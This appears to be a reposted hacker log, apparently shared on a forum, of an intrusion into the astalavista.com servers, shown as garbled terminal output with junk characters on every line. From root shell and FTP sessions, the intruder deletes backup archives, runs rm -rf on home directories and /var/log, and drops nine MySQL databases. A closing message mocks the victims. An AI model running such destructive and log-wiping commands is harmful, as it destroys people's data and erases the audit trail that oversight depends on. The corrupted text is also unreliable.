dr-x—— 1 root users 4096 Jun 4 06:13 astalavista.com6 O$ y# I. L$ J; g$ X4 o+ v; \
226 Transfer complete.
3 r- C% w. u7 n3 E: S* zftp> cd astalavista.com
- \$ c7 f0 V' N3 l0 v250 CWD command successful.
9 I Y, a0 }$ B. v& Zftp> ls -la
9 j: m9 m. N$ Y227 Entering Passive Mode (212,254,194,163,2,189)
+ A5 M9 ~) t0 M; v150 Opening BINARY mode data connection for ‘file list’., A- |" \. x; w; X0 k% T7 `
-rw-rw-rw- 1 astalavista.com users 23410936878 Apr 29 22:10 09-04-28-astacom_full.tar" s4 [; i1 X% Z+ ]% l0 A5 T6 s
-rw-rw-rw- 1 astalavista.com users 20617651590 Apr 29 14:18 09-04-28-astacom_full.tar.bz2! D# ] `! d! n: N N$ g) H
-rw-rw-rw- 1 astalavista.com users 88287111 Apr 29 15:57 09-04-29-astacom_sql_full.sql.tar.bz2
/ X; ^1 U+ A" I J-rw-rw-rw- 1 astalavista.com users 26413034040 May 2 00:21 09-05-01-astacom-Public_HTML.tar% p V, a" e/ ]7 S& c9 ]
-rw-rw-rw- 1 astalavista.com users 277843549 May 1 17:29 09-05-01-astacom-SQL_Dump.tar
7 h! x1 E1 K% W5 c$ U) m9 N[snip]
. S& H% M7 q4 Y h. [2 F, `* ^- N226 Transfer complete.( x/ ~. r) D* H6 [2 h+ z$ O
ftp> mdelete *, q$ e% G# q; T) f
ftp> ls -la
9 E1 y7 a# G* {/ I227 Entering Passive Mode (212,254,194,163,2,193)* d" T* r1 R* V: y
150 Opening BINARY mode data connection for ‘file list’.. n; w! r6 P2 s9 Y3 k {
226 Transfer complete.: j, P7 z5 l4 S, t- `
ftp>$ J0 n& ]* l1 a0 h) q$ Z- G' Q
5 y1 X# S o/ x; Lsh-3.2# cd /home+ w1 z1 p. j; w, x
sh-3.2# ls -la
1 U7 ?; |. R, c, O$ k. Itotal 120" P/ V7 b0 q: W, T6 o& _8 Y: P8 h( ]5 M
drwxr-xr-x 14 root root 4096 Mar 11 17:56 .
; w {5 Y+ U9 m2 `" t& f$ Gdrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..1 \, l b$ L; q/ V$ [( n. p
drwx–x–x 9 admin admin 4096 Nov 28 2007 admin& a. G+ f! ?" ^9 t: s ^2 W
-rw——- 1 root root 8192 Jun 4 03:03 aquota.group! T5 E, H- q1 \; C$ x) i! R
-rw——- 1 root root 8192 Jun 3 02:45 aquota.user
% y( J/ i: L/ I7 L$ \/ h( Ydrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet; K) m; G! z: C' H
drwxr-xr-x 2 root root 4096 Jul 29 2008 backup
, p4 `( Y: J8 l' c5 f) Wdrwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161 A' l) t! n! v7 P. X+ B9 o8 \
drwx–x–x 10 com com 4096 Apr 28 12:40 com
: e$ Y v0 P _& J' z) @1 ?# Udrwxr-xr-x 2 root root 4096 May 17 2007 ftp
2 Q% z# ]3 p! bdrwx—— 3 jon jon 4096 Sep 21 2007 jon
& I# O) A" ^) v* p, M: hdrwx—— 2 root root 16384 Sep 11 2007 lost+found
0 D* n l! ]6 y/ ^3 y) Sdrwxr-xr-x 2 root root 4096 Sep 14 2007 my
. k- j6 j# E& k: ~drwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata0 s y, X" b7 h+ l& K
drwx—— 2 jon jon 4096 Sep 15 2007 test
8 [+ i! k$ _' z4 rdrwxrwxrwt 2 root root 4096 Jul 29 2008 tmp
* k& V6 P! N) e# \6 K1 z7 _7 P, b1 n% M* c' l2 H
sh-3.2# rm -rf backup/0 P5 U$ m- w' J f
sh-3.2# rm -rf backup.14161/) X; w4 A- Q4 k
sh-3.2# rm -rf ftp/0 Z4 ]- B- I( j/ Q* u
sh-3.2# rm -rf jon/
5 d# _) \! G. P0 K; k/ x0 r6 U) g' ysh-3.2# rm -rf my/: e; X k1 j+ c2 ?- O1 g
sh-3.2# rm -rf mysqldata/. x; A+ q: [9 F3 D% @9 f0 S, D
sh-3.2# rm -rf test/
; }8 C8 O4 W7 J/ y% Rsh-3.2# rm -rf tmp/( f |6 @4 I7 k) P3 R
sh-3.2# cd ~
% q( C Q7 w' T' ?+ hsh-3.2# rm -rf *
9 y% { [% ~+ K; Y9 V$ T9 D- psh-3.2# rm -rf /var/log/8 }2 |7 O; G4 s1 ?: k
rm: cannot remove directory `/var/log//proftpd’: Directory not empty- ]. U. Q n9 c6 K8 f: O |# N
sh-3.2# rm -rf /home/*
5 ?6 o) G# T2 @ O8 bsh-3.2# mysql: k! A) z( y' N8 ^
Welcome to the MySQL monitor. Commands end with ; or \g.
7 @4 r8 a$ c& {- v- _0 ?3 x; vYour MySQL connection id is 407156' d2 m& \- L# t
Server version: 5.0.45-community-log MySQL Community Edition (GPL)
; ^ |3 H! F6 l' Z! k: J* p" Q: G* C( w7 L$ f
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.( g, P( U, E! {; a8 U5 K
6 p' r' l) r: n4 b7 Y% {6 }/ \! D
mysql> show databases;
7 x" j2 U( y3 h% H4 ~9 J+———————–+
, \ r2 ~; Z( {6 O. X: q0 z| Database |
1 v2 W, K! o- M1 A4 Z/ j+———————–+, c/ @. e5 n* h. q
| information_schema |
/ _" S0 Y7 W9 y$ F9 b: S* G0 r$ p' h3 [| astanet_ads |4 d2 i" k# X! Y- B7 Q
| astanet_mailing_lists |
9 n- J! ~- b# T; z6 U& m| astanet_mediawiki |/ n1 Y$ d0 O# _
| astanet_membersystem |) ?' c: {5 m' \+ d" W- A1 a: f3 Y
| com_contrexx |; n8 L& ^2 P8 x7 M* Z% X/ o) o/ A
| com_contrexx2 |( R5 p2 ~7 x0 g1 F
| com_contrexx2_live |
% E5 l8 j( D R6 d) R| da_roundcube |
. y5 N! T X. \5 p$ k7 e4 a| dolphin |9 j! j5 G7 M$ I# L& H
| ideapool |
V% l7 C$ j5 J8 O! w| mysql |; m v& d6 Y1 S' _/ X
| test |
2 h. @" A5 d- G6 z6 \| yourmaster |
: t1 P# F3 I, c; X. \4 Q+———————–+
V2 }# ~! a; B2 \* M/ r14 rows in set (0.03 sec)$ t* q" m' L* O5 s8 }
) C% t2 K( y. O) ~& U/ Ymysql> drop database astanet_membersystem;
# s$ ~' P6 j+ W6 LdroQuery OK, 46 rows affected (0.81 sec)
# S% \! {( ^0 n
; ?2 z; B) C, x7 \3 i: Z7 lmysql> drop database com_contrexx;$ D- _( }7 i/ B4 F {% l
Query OK, 211 rows affected (2.72 sec)2 r3 c w. V% z* t4 I/ l
. {8 M _5 x6 Z1 l5 t, D7 z; n1 R# g, Emysql> drop database com_contrexx2;
1 T' E' L. ^8 ?: K) xQuery OK, 237 rows affected (2.23 sec)
$ a. Y [1 O3 T% d4 ?0 p
7 p3 |' P7 x" ^9 zmysql> drop database com_contrexx2_live;2 G, P" }5 e3 {
Query OK, 227 rows affected (7.63 sec)- Y# i+ B0 V! ^6 m
" d9 a& A/ i- G! H Emysql> drop database ideapool;' q. H h2 ?- `: m& W, J: \) w$ k: T
Query OK, 69 rows affected (0.19 sec)4 H- k- V$ q; J7 S+ H
) n/ r7 l4 e7 s
mysql> drop database yourmaster;; ?; S4 Z3 t( {) O4 t
Query OK, 158 rows affected (0.55 sec)
; D2 c6 `/ c& J) N' \! p- _, s3 g/ a, Y I' N. i3 K3 M* C; F
mysql> drop database astanet_ads;
: ?( o% \+ ^7 O. @Query OK, 9 rows affected (0.11 sec)
* f6 T5 K0 h8 M: g4 ~* U; \' A& Q9 D. V! w' L9 `9 m
mysql> drop database astanet_mailing_lists;
+ S3 @3 F' d+ P- s5 ]Query OK, 24 rows affected (1.47 sec) z- K ]5 ~$ c8 k
x* \- u2 X4 `: `
mysql> drop database astanet_mediawiki;. u& M) R5 z/ U+ X, ?! H
Query OK, 31 rows affected (0.51 sec). M4 s. J! D' q. e3 Y0 o% |- b# g. D E
+ u" B) Z/ ?3 y9 R8 ? cmysql> show databases;1 D1 k/ o; e: Y8 L1 a
+——————–+
7 |% ~6 S$ D. Z5 F7 v6 [| Database |, `- ] U7 i: J0 v4 h5 W, @ ~
+——————–+8 ~) O, O, V- k1 U
| information_schema |
9 z7 d% g" Q! M0 y9 a0 i; M' m| da_roundcube |
7 X4 V7 l; ~' X4 g7 N" {| dolphin |
- _& B5 A! X) r w8 R4 t/ A| mysql |$ z2 N8 S8 J4 Z' x( Q: G5 {
| test |6 a7 G q) p1 A8 K# w# f
+——————–+! L+ `7 w8 o2 a
5 rows in set (0.00 sec)5 h; M: ]7 n# Q2 ` o1 e6 `
$ e" W7 U) T& {) u
What a journey! We’re not sure exactly why the “Terminator” had any influence on: u2 i( N A7 A
their naming (conventions) but we’re sure Arnold himself wouldn’t be in the
) M( |5 S. e0 N. U4 ]) Awrong to say this pack of morons *wont be back*.
, @! q; h2 U3 z' } |
发表于 2012-11-6 21:07:34
收藏
支持
反对